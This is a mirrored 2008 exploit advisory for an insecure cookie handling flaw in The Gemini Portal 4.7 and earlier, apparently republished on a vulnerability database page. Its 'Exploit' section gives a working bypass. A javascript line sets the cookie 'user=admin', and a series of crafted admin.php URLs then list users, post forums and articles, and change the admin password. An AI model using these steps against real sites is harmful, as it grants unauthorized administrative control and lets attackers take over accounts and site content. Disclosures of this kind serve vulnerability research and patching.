Lucene search
K

gemini-cookie.txt

🗓️ 27 Sep 2008 00:00:00Reported by PepeluxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

The Gemini Portal <= 4.7 Insecure Cookie Handling Vulnerability. Allows unauthorized access to admin panel

Code
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
The Gemini Portal <= 4.7 / Insecure Cookie Handling Vulnerability  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
Program: The Gemini Portal  
Version: <= 4.7  
File affected: admin/*  
Download: http://www.arzdev.com/downloads/1/Gemini  
  
  
Found by Pepelux <pepelux[at]enye-sec.org>  
eNYe-Sec - www.enye-sec.org  
  
  
>> Program description (by the author website) <<  
  
The Gemini Portal 4 is the most scalable, dynamic, and powerful content  
management system there is. It is perfect for large business network services,  
to the simple personal web site for use with PHP and MySQL.', 'The Gemini  
Portal is a dynamic content management system. It is ideal for any size  
community, allowing users, moderators, limited admins, and global admins log  
in. Many of the built in pages use the dynamic database file system (ArzFS)  
to manipulate files and folders.  
  
  
>> Bug <<  
  
You can access to the admin panel altering the cookie and adding a parameter  
in the navigation bar.  
  
  
>> Exploit <<  
  
Note: POST is not checked and you can enter all by GET. Also you can create a  
simple perl script to send GET and POST packages.  
  
First step: javascript:document.cookie = "user=admin"  
  
Second step: navigate by the admin panel adding the parameter '&name=users' in  
the navigation bar. Examples:  
  
to view the main admin panel:  
http://site/admin.php?page=main&name=users  
  
to list all forums:  
http://site/admin.php?page=forums&name=users  
  
to post a new forum:  
http://site/admin.php?page=forums&name=users&page=forums&op=newf&fview=Everyone&fpost=Everyone&forumname=WHAT_YOU_WANT&descrip=WHAT_YOU_WANT  
  
to list articles:  
http://site/admin.php?page=articles&name=users  
  
to create a new article:  
http://site/admin.php?page=articles&name=users&op=newd&dtitle=WHAT_YOU_WANT&ppcontent=WHAT_YOU_WANT&dfolder=0&category=1&autor=admin  
  
to list all users:  
http://site/admin.php?page=users&name=users  
  
to edit the admin profile (you can change the admin password)  
http://site/admin.php?page=users&op=edi&uid=2&name=users  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Sep 2008 00:00Current
7.4High risk
Vulners AI Score7.4
14